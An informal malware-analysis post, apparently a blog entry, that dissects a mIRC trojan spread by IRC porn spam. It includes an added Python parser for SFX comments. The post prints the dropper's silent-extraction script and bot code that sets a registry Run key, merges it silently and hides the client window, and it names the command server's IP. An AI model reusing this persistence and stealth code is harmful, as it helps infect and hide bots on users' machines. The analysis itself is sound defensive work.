Ok, I idle in a few channels on the Rizon IRC network. Rizon has been spammed to death lately by a botnet. So I'm sitting in front of my machine and get bored. The spam message promises Russian sex! I know this is probably just a bot, but I do love my Russian sex. So the spam message tells me to go to the URL. I go there and right off the bat I'm prompted to download movie.mpg.exe. That doesn't look like any Russian porn video I've ever seen. I ignore that and look at the top pics/links of porn-related material. Ooooohh, there's the Russian porn. I click a link, and what do you know, that same exe is being served to me. Meh, let's download 'er and take a look.

So I save it to my desktop and notice it's just a self-extracting RAR
file. So right off the bat I know these guys either

A) Aren't that smart
B) Are lazy as hell
- They didn't even bother to pack it better or to scramble it with UPX, but that's another story altogether.

What's the best thing about these RARs, you ask? Well, simple. Right-click and go to Properties, then go to the Comment tab. We see this.

;The comment below contains SFX script commands

Path=C:\WINDOWS\java\
SavePath
Setup=C:\WINDOWS\java\mirc.exe
Silent=1
Overwrite=2

This tells us that it's going to install to C:\windows\java and when the exe is done unpacking it's going to run mirc.exe. Bingobango, it's a simple little mIRC trojan... if only we could have seen this coming... Ok, because it's a RAR file we can open it with WinRAR: right-click on it again and click Open with WinRAR.
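The SFX comment is the quickest triage win on a self-extractor like this: the Setup= line names what runs after unpacking and Silent=/Overwrite= say how quietly it does it. As an added example (my own code, not from the original post), here is a small Python parser that reads a comment like the one above and turns it into triage findings. The sample comment is constructed from the text shown above; the meaning of the Silent and Overwrite values follows WinRAR's SFX script reference (Silent=1 hides the start dialog, Overwrite=1 overwrites, Overwrite=2 skips existing files).

```python
import re

# Constructed sample: the SFX script comment as seen in the RAR's Comment tab.
SAMPLE_COMMENT = """;The comment below contains SFX script commands

Path=C:\\WINDOWS\\java\\
SavePath
Setup=C:\\WINDOWS\\java\\mirc.exe
Silent=1
Overwrite=2
"""


def parse_sfx_comment(comment: str) -> dict:
    """Return {directive: value} for Key=Value lines in an SFX comment.
    Flag-only directives such as 'SavePath' get the value True.
    Blank lines and ';' comment lines are ignored."""
    script = {}
    for raw in comment.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        key, sep, value = line.partition("=")
        script[key.strip()] = value.strip() if sep else True
    return script


def assess_sfx(script: dict) -> list:
    """Return human-readable triage findings for a parsed SFX script."""
    findings = []
    setup = script.get("Setup")
    if setup:
        findings.append("runs after extraction: " + setup)
    if script.get("Silent") in ("1", "2"):
        findings.append("extracts silently (start dialog hidden from the user)")
    overwrite = script.get("Overwrite")
    if overwrite == "1":
        findings.append("overwrites existing files without asking")
    elif overwrite == "2":
        findings.append("silently skips files that already exist")
    path = script.get("Path")
    # Dropping into the Windows directory is a common way to blend in.
    if path and re.match(r"^[A-Za-z]:\\WINDOWS\\", path, re.IGNORECASE):
        findings.append("drops into a system directory: " + path)
    return findings


if __name__ == "__main__":
    parsed = parse_sfx_comment(SAMPLE_COMMENT)
    for finding in assess_sfx(parsed):
        print("-", finding)
```

On a real sample you would feed parse_sfx_comment the comment text pulled from the archive (WinRAR shows it in the Comment tab; unrar's `-c` switch or a library such as rarfile also exposes it) rather than the constructed string.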

Files in the rar!

bear.txt
Con32.dll
edih.dll
connects
mirc.exe

Right off the bat we know that this is mIRC. mIRC needs an ini file and a remote file that holds all the remote code. Click on these files and view them.

bear.txt snippet

; Set bY mC_YaRgIc ...

on *:start: {
celebili
timer12123 0 1 secret
timerasd 0 150 mC_YARGIc
mC_YARGIc
unset %*
.timer -i 1 2 NICK $_rands
.timer -i 1 2 ANICK $_rands
.timer -i 1 2 IDENTD ON $_rands
.timer -i 1 2 FULLNAME $_rands
.timer -i 1 2 EMAILADDR $_rands
.timer -i 0 60 _start
.timer -i 0 10 _reg
if $exists(up.reg) {
.remove up.reg
}

Yep, this file holds all the guts of the bot. The remote code.

Con32.dll snippet

www.klavye.com
Kenan
mkilhan
Crasus
mC_YaRgIc
4,1 --15,1 0,1K15,1a0,115,1a0,1k15,1 v44,1 --15,1 www.Kacak.net 4,1-- 
mIRC v6.03 Khaled Mardam-Bey
mIRC 6.16 Khaled Mardam-Bey
mIRC v6.15 Khaled Mardam-Bey
mIRC v6.14 Khaled Mardam-Bey
mIRC v6.12 Khaled Mardam-Bey
mIRC v6.11 Khaled Mardam-Bey
mIRC v6.1 Khaled Mardam-Bey

A version file. So if other clients CTCP VERSION this bot they will get different client version replies. Typical.

Connects snippet

[warn]
fserve=on
dcc=off
[dirs]
logdir=....\
waves=......\
midis=......\
mp3s=......\
wmas=......\
oggs=......\
[options]
n0=0,0,0,1,0,0,300,0,0,0,1,0,0,0,2,0,0,2,0,0,4096,0,1,0,0,0,1,1,0,50,0,1
n1=5,100,0,0,0,0,0,0,2,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,1,1,0,0,1,0,0,0,0,0
n3=5000,0,0,0,0,0,1,1,0,1,0,1,0,0,0,1,3,1,0,1,0,0,0,0,1,1,0,23,0,0,1,3,180,0
n4=1,0,1,0,0,3,9999,0,0,0,1,0,1024,0,1,99,60,0,0,0,3,0,0,0,1,5000,1,5,0,0,3,0,1,1
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,1,26,0,0,1,8192,1,0,0,82,0
n6=0,0,12,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,100,1,1,0,0,1,0,0,4,1,0,1
n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,3,0,1,1,1,1,1,0,0,0,0,1,1,1,1

There's our mirc.ini file.

Edih.dll snippet

MZ?   ? @  ? !?L!This program cannot be run in DOS mode. $

????????????u????????????????????????Rich?? PE L m?< !
 [? [? F  p              K 

Hmmmm, this is an actual DLL file. Wonder what it does? View the contents of bear.txt.
**NOTE** everything after a ; on a script line is my description of what it does, not part of the script.

; Set bY mC_YaRgIc ...

on *:start: {
celebili                              ; calls an alias
timer12123 0 1 secret                 ; calls an alias every 1 second
timerasd 0 150 mC_YARGIc              ; calls an alias every 2.5 minutes
mC_YARGIc                             ; calls an alias
unset %*                              ; unsets all variables
.timer -i 1 2 NICK $_rands            ; timer sets the nick to something random
.timer -i 1 2 ANICK $_rands           ; timer sets the alt nick to something random
.timer -i 1 2 IDENTD ON $_rands       ; timer sets the identd nick to something random
.timer -i 1 2 FULLNAME $_rands        ; timer sets the full name to something random
.timer -i 1 2 EMAILADDR $_rands       ; timer sets the email address to something random
.timer -i 0 60 _start                 ; calls an alias
.timer -i 0 10 _reg                   ; calls an alias
if $exists(up.reg) {
.remove up.reg                        ; deletes up.reg
}
write up.reg REGEDIT4                 ; makes a reg file
write up.reg [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
write up.reg "Startup"=" $+ $nopath($mircexe) $+ "
_reg
}
on *:exit: {
run -n regedit /s up.reg              ; when mIRC closes it runs regedit to silently (/s) merge that reg file again
run $nopath($mircexe)                 ; so mIRC will start again on boot
}
on *:connect: {
if $serverip == %serverip {           ; if/when mIRC connects to the server, join %join
.timer -i 1 5 JOIN %join
}
}
on *:disconnect: {                    ; part all channels and rejoin the server
partall
server
}

There was a lot of code here, but it was all the bot code: basically remote commands for the 'admins' of this bot. !spam would spam, !clone would load more clones, !server would change server, and stuff like that. I don't want more spam so I'm not going to post all the code.

alias _servmessage {
if $server {
if m isincs $chan(%join).mode && $me !isvoice %join {   ; join channel
return
}
scid 1 .msg %join $1-   ; join channel and hide the channel window in mIRC so the user can't see it
}
}
alias mC_YARGIc {
scid -a window -hn "Status Window"   ; hide the status window so the user can't see it or do anything
}
alias celebili { .echo Kenan $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) }
alias secret { if ($appstate != hidden) { .echo hidden $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) } }
alias _start {
if !%readed {
_opensocks
}
}

The celebili code above hides mIRC from the desktop. The secret alias says that if mIRC isn't hidden, hide it!

The rest of this file was just more remote code that I'm not going to publish.


Open up connects and look for this line: host=208.53.162.102SERVER:208.53.162.102:6667. There's the server this bot connects to. Let's open our IRC client and connect to it. When we connect we get irc.mkilhan.com from the MOTD (Message Of The Day, the IRC server's message), so we know that this server is mkilhan.com. Let's go to their website and take a look. Nope, nothing really of any use there.
Ok, let's copy a mirc.exe into that C:\windows\java dir, open up bear.txt and edit it so it doesn't do anything nasty when we connect. I'm going to remove all the hidden/reg stuff and show you what it looks like when we're done.

on *:start: {
unset %*
.timer -i 1 2 NICK $_rands
.timer -i 1 2 ANICK $_rands
.timer -i 1 2 IDENTD ON $_rands
.timer -i 1 2 FULLNAME $_rands
.timer -i 1 2 EMAILADDR $_rands
.timer -i 0 60 _start
.timer -i 0 10 _reg
}


Also go down to these lines and edit them to match what I have, so we can see what's going on when we connect.


alias mC_YARGIc {
echo Status Window not hidden anymore, we wanna see stuff
}
alias celebili { .echo celebili }   ; don't need that hide DLL, and we'll see when this alias is called
alias secret { if ($appstate != hidden) { .echo hidden } }   ; same as above
alias _start {
if !%readed {
echo _opensocks   ; we don't need that, let's just echo it
}
}

Ok, so now we run the mirc.exe. We connect to the network, then join #intikam. Interesting. Look at all those bots, there's gotta be 100 or so. Let's /whois the admins. They're admins, so their hostmasks are masked. Meh, we got 'em anyway. Let's do a /list so we can see other channels. There's just 4 or so. Nothing special. At this point they noticed one of their bots snooping
around their network and killed me with a K-line. Guess I'm not wanted there.

Clean up!
Ok, delete those files from the java dir, then open regedit and go to

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete the mirc entry.

Closing!

Ok, this bot was simple. It would be more effective if the bot was packed better; it would have been a little harder to pick up, but not very. Also they should have used the %windir% variable instead of C:\windows so the bot would work on more OSes. They shouldn't have used their IRC nicks as aliases. After I did this experiment I whois'ed their IPs and emailed the abuse accounts for the subnets of both the web hosting site and the IRC network and told them about the bot. Might not do anything, but still. I could have gone further and tried to CTCP chat the admins, then used netstat to find their IPs. Meh, I don't really care. I'm glad I got to take a look at what they're doing and how all this stuff works. I hope someone finds this info useful or entertaining. It just goes to show you that the promise of free sex on the internet is usually just that.

One More Thing!
If you have ever talked to me you know I can't spell and my grammar sucks. I tried to spell check with the Google toolbar, nothing came up. My OpenOffice isn't working as it should, so there might be some spelling mistakes. FOR THIS I'M SORRY!